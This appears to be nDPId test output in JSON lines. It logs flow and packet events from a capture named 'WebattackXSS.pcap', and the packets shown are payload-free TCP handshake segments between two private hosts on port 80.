+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7923,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":559,"flow_packet_id":3,"flow_last_seen":1499347921171,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347921171,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rYNAAD4GGFWsEAABwKgKMoUqAFCWpCaU4YGl1YAQAOVIJwAAAQEICgE8ixID5lyG"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7930,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347922471,"flow_last_seen":1499347922471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347922471,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34104,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7930,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":560,"flow_packet_id":1,"flow_last_seen":1499347922471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347922471,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+oRAAD4Gy0usEAABwKgKMoU4AFCzyHbTAAAAAKACchAhTAAAAgQFtAQCCAoBPIxXAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7931,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":560,"flow_packet_id":2,"flow_last_seen":1499347922471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347922471,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhTjpB7A2s8h21KAScSAnOwAAAgQFtAQCCAoD5l3LATyMVwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7932,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":560,"flow_packet_id":3,"flow_last_seen":1499347922472,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347922472,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+oVAAD4Gy1KsEAABwKgKMoU4AFCzyHbU6QewN4AQAOXGQgAAAQEICgE8jFcD5l3L"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7942,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347923737,"flow_last_seen":1499347923737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347923737,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34118,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7942,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":561,"flow_packet_id":1,"flow_last_seen":1499347923737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347923737,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ldBAAD4GMACsEAABwKgKMoVGAFBUeRhDAAAAAKACchDd4QAAAgQFtAQCCAoBPI2TAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7943,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":561,"flow_packet_id":2,"flow_last_seen":1499347923737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347923737,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhUa68naDVHkYRKAScSBKXQAAAgQFtAQCCAoD5l8HATyNkwEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7944,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":561,"flow_packet_id":3,"flow_last_seen":1499347923737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347923737,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ldFAAD4GMAesEAABwKgKMoVGAFBUeRhEuvJ2hIAQAOXpZAAAAQEICgE8jZMD5l8H"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7960,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347926328,"flow_last_seen":1499347926328,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926328,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7960,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":562,"flow_packet_id":1,"flow_last_seen":1499347926328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347926328,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Y4hAAD4GYkisEAABwKgKMoVgAFAOjvOTAAAAAKACchBF2gAAAgQFtAQCCAoBPJAbAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":562,"flow_packet_id":2,"flow_last_seen":1499347926328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347926328,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhWB82qzsDo7zlKAScSC3fAAAAgQFtAQCCAoD5mGPATyQGwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7962,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":562,"flow_packet_id":3,"flow_last_seen":1499347926329,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347926329,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Y4lAAD4GYk+sEAABwKgKMoVgAFAOjvOUfNqs7YAQAOVWhAAAAQEICgE8kBsD5mGP"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347793575,"flow_last_seen":1499347798838,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60990,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347793575,"flow_last_seen":1499347798838,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60990,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347796130,"flow_last_seen":1499347801839,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32784,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347796130,"flow_last_seen":1499347801839,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32784,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347797419,"flow_last_seen":1499347802840,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32798,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347797419,"flow_last_seen":1499347802840,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32798,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347798713,"flow_last_seen":1499347803840,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32812,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347798713,"flow_last_seen":1499347803840,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347801271,"flow_last_seen":1499347806841,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32838,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347801271,"flow_last_seen":1499347806841,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32838,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347792291,"flow_last_seen":1499347797838,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60976,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347792291,"flow_last_seen":1499347797838,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60976,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347927657,"flow_last_seen":1499347927657,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347927657,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":563,"flow_packet_id":1,"flow_last_seen":1499347927657,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347927657,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NcxAAD4GkASsEAABwKgKMoVuAFCXD6SrAAAAAKACchAK5wAAAgQFtAQCCAoBPJFnAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7973,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":563,"flow_packet_id":2,"flow_last_seen":1499347927657,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347927657,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhW4waOSnlw+krKAScSCP9AAAAgQFtAQCCAoD5mLbATyRZwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7974,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":563,"flow_packet_id":3,"flow_last_seen":1499347927658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347927658,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Nc1AAD4GkAusEAABwKgKMoVuAFCXD6SsMGjkqIAQAOUu\/AAAAQEICgE8kWcD5mLb"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7993,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347930265,"flow_last_seen":1499347930265,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347930265,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7993,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":564,"flow_packet_id":1,"flow_last_seen":1499347930265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347930265,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OHxAAD4GjVSsEAABwKgKMoWIAFCpfquPAAAAAKACchDu7QAAAgQFtAQCCAoBPJPzAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7994,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":564,"flow_packet_id":2,"flow_last_seen":1499347930265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347930265,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhYivvJwGqX6rkKAScSA6vAAAAgQFtAQCCAoD5mVnATyT8wEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7995,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":564,"flow_packet_id":3,"flow_last_seen":1499347930266,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347930266,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OH1AAD4GjVusEAABwKgKMoWIAFCpfquQr7ycB4AQAOXZwwAAAQEICgE8k\/MD5mVn"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8002,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347931529,"flow_last_seen":1499347931529,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347931529,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8002,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":565,"flow_packet_id":1,"flow_last_seen":1499347931529,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347931529,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8j75AAD4GNhKsEAABwKgKMoWWAFDyyRqRAAAAAKACchA1VwAAAgQFtAQCCAoBPJUvAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8003,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":565,"flow_packet_id":2,"flow_last_seen":1499347931530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347931530,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhZYdLW4k8skakqAScSBAWwAAAgQFtAQCCAoD5majATyVLwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8004,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":565,"flow_packet_id":3,"flow_last_seen":1499347931530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347931530,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0j79AAD4GNhmsEAABwKgKMoWWAFDyyRqSHS1uJYAQAOXfYgAAAQEICgE8lS8D5maj"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8023,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347934152,"flow_last_seen":1499347934152,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347934152,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34224,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8023,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":566,"flow_packet_id":1,"flow_last_seen":1499347934152,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347934152,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DbVAAD4GuBusEAABwKgKMoWwAFC\/7poKAAAAAKACchDmDgAAAgQFtAQCCAoBPJe\/AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8024,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":566,"flow_packet_id":2,"flow_last_seen":1499347934152,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347934152,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhbAhVp9vv+6aC6AScSC5DgAAAgQFtAQCCAoD5mkzATyXvwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8025,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":566,"flow_packet_id":3,"flow_last_seen":1499347934152,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347934152,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DbZAAD4GuCKsEAABwKgKMoWwAFC\/7poLIVafcIAQAOVYFgAAAQEICgE8l78D5mkz"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347935445,"flow_last_seen":1499347935445,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347935445,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34238,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":567,"flow_packet_id":1,"flow_last_seen":1499347935445,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347935445,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lcJAAD4GMA6sEAABwKgKMoW+AFC8fgzAAAAAAKACchB1eAAAAgQFtAQCCAoBPJkCAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":567,"flow_packet_id":2,"flow_last_seen":1499347935445,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347935445,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhb4dfTaTvH4MwaAScSCz6gAAAgQFtAQCCAoD5mp2ATyZAgEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8034,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":567,"flow_packet_id":3,"flow_last_seen":1499347935445,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347935445,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0lcNAAD4GMBWsEAABwKgKMoW+AFC8fgzBHX02lIAQAOVS8gAAAQEICgE8mQID5mp2"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8044,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347936727,"flow_last_seen":1499347936727,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936727,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8044,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_packet_id":1,"flow_last_seen":1499347936727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347936727,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IMJAAD4GpQ6sEAABwKgKMoXMAFAQdrqBAAAAAKACchBycAAAAgQFtAQCCAoBPJpDAAAAAAEDAwc="} 
